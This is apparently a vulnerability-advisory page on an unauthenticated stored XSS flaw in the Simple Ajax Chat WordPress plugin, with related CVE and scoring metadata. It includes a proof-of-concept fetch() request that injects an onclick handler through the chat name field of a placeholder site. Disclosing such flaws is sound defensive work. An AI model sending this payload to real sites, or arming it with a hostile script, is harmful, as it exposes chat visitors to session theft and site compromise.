Lucene search
FourcadeWPEX-ID:BF3A31DE-A227-4DB1-BD18-CE6A78DC96FBHistoryFeb 28, 2024 - 12:00 a.m.
Simple Ajax Chat < 20240223 - Unauthenticated Stored XSS
2024-02-2800:00:00
fourcade
38
ajax chat
unauthenticated
stored xss
vulnerable
post exploit
cors
fetch api
Description The plugin does not prevent visitors from using malicious Names when using the chat, which will be reflected unsanitized to other users.
await fetch("http://vulnerable-site.tld/wp-content/plugins/simple-ajax-chat/simple-ajax-chat-core.php?sacSendChat=yes", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0",
"Accept": "*/*",
"Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
"Content-Type": "application/x-www-form-urlencoded",
"Sec-GPC": "1"
},
"body": "n=%22onclick=%22alert`1`%22&c=adasd&u=https%3A%2F%2F&sac_nonce=$NONCE&sac_js_nonce=$NONCE",
"method": "POST",
"mode": "cors"
});Related
nvd
nvd
CVE-2024-1983
2024-03-20 05:15:45
CVE-2024-2957
2024-04-09 19:15:38
cve
cve
CVE-2024-1983
2024-03-20 05:15:45
CVE-2024-2957
2024-04-09 19:15:38
cvelist
cvelist
CVE-2024-1983 Simple Ajax Chat < 20240223 - Unauthenticated Stored XSS
2024-03-20 05:00:02
vulnrichment
vulnrichment
CVE-2024-1983 Simple Ajax Chat < 20240223 - Unauthenticated Stored XSS
2024-03-20 05:00:02
wpvulndb
wpvulndb
Simple Ajax Chat < 20240223 - Unauthenticated Stored XSS
2024-02-28 00:00:00
wordfence
wordfence
AI Score
6.7
Confidence
High
EPSS
0
Percentile
9.0%
Related for WPEX-ID:BF3A31DE-A227-4DB1-BD18-CE6A78DC96FB